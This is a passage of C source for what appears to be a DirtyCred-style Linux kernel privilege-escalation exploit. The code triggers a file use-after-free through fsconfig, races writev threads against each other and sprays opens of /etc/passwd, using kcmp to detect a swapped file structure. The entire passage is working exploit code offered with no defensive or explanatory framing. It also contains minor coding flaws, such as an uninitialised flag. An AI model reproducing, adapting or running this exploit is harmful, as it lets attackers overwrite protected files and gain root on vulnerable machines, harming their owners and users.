    for (offset = 0; offset < 0x80000; offset++)
    {
        void *r = mmap((void *)(0x30000000 + 0x1000 * offset), 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, 0, 0);
        if (r < 0)
        {
            perror("mmap error");
            exit(-2);
        }
    }

    WriteFlag = 1;
    mem = (void *)0x30000000;
    for (int i = 0; i < 5; i++)
    {
        iov[i].iov_base = mem;
        iov[i].iov_len = (offset - 1) * 0x1000;
    }

    printf("SlowWrite Finished !\n");
}

void OverWrite()
{
    printf("Staring OverWrite...\n");
    char data[0x1000] = {"\nDirtyCred is Working \n\n"};
    struct iovec iov;
    iov.iov_base = data;
    iov.iov_len = strlen(data);
    while (!WriteFlag)
    {
    }
    SprayFlag = 1;
    if (writev(UAFfd, &iov, 1) < 0)
    {
        printf("Error to write\n");
    }
    printf("OverWrite Finished!\n");
}

void SpriyFile()
{
    int found;
    while (!SprayFlag)
    {
    }
    printf("UAF File's fd is %d, Start spriy", UAFfd);

    for (int i = 0; i < MAX_SPRAY_FILE_NUM; i++)
    {
        fds[i] = open("/etc/passwd", O_RDONLY);
        if (fds[i] < 0)
        {
            perror("open passwd");
        }
        if (syscall(__NR_kcmp, getpid(), getpid(), KCMP_FILE, UAFfd, fds[i]) == 0)
        {
            found=1;
            printf("Hacked success, File id is %d", fds[i]);
            for (int j = 0; j<i; j++)
            {
                close(fds[j]);
            }
            break;
        }
    }

    if (found == 1)
    {
        printf("HackWrite success");
        exit(0);
    }
    printf("Failed");
    exit(-1);
    
}

void Exploit()
{
    int FSfd = open("cgroup", O_RDONLY);
    if (FSfd < 0)
    {
        perror("open cgroup");
        exit(1);
    }
    symlink("./data", "./uaf");

    UAFfd = open("./uaf", O_WRONLY);
    if (UAFfd < 0)
    {
        perror("open uaf");
        exit(1);
    }

    if (syscall(__NR_fsconfig, FSfd, 5, "source", 0, UAFfd))
    {
        perror("fsconfig");
        exit(1);
    }
    close(FSfd);

    pthread_t Thread2;
    pthread_create(&Thread2, NULL, SlowWrite, NULL);
    pthread_t Thread3;
    pthread_create(&Thread3, NULL, OverWrite, NULL);
}

void StartExploit()
{
    SandboxSetup();
    Exploit();
}

int WaitStatus(int pid)
{
    if (pid < 0)
    {
        exit(-1);
    }
    int Status = 0;
    while (waitpid(-1, &Status, __WALL) != pid)
    {
    }
    return WEXITSTATUS(Status);
    
}

void DoSandboxUsernameSpace()
{
    UID = getuid();
    GID = getgid();
    mprotect(SandboxStack, 0x1000, PROT_NONE);

    while (1)
    {
        int pid = clone(StartExploit, &SandboxStack[sizeof(SandboxStack) - 64], CLONE_NEWUSER | CLONE_NEWPID, 0);
        int ReturnStatus = WaitStatus(pid);
        if (ReturnStatus == 0)
        {
            printf("Success \n");
            return 1;
        }
        else
        {
            printf("Return \n");
        }
    }
    
}

int main(void)
{
    MakeTestEnvir();
    syscall(__NR_mmap, 0x1ffff000ul, 0x1000ul, 0ul, 0x32ul, -1, 0ul);
    syscall(__NR_mmap, 0x20000000ul, 0x1000000ul, 7ul, 0x32ul, -1, 0ul);
    syscall(__NR_mmap, 0x21000000ul, 0x1000ul, 0ul, 0x32ul, -1, 0ul);
    DoSandboxUsernameSpace();
}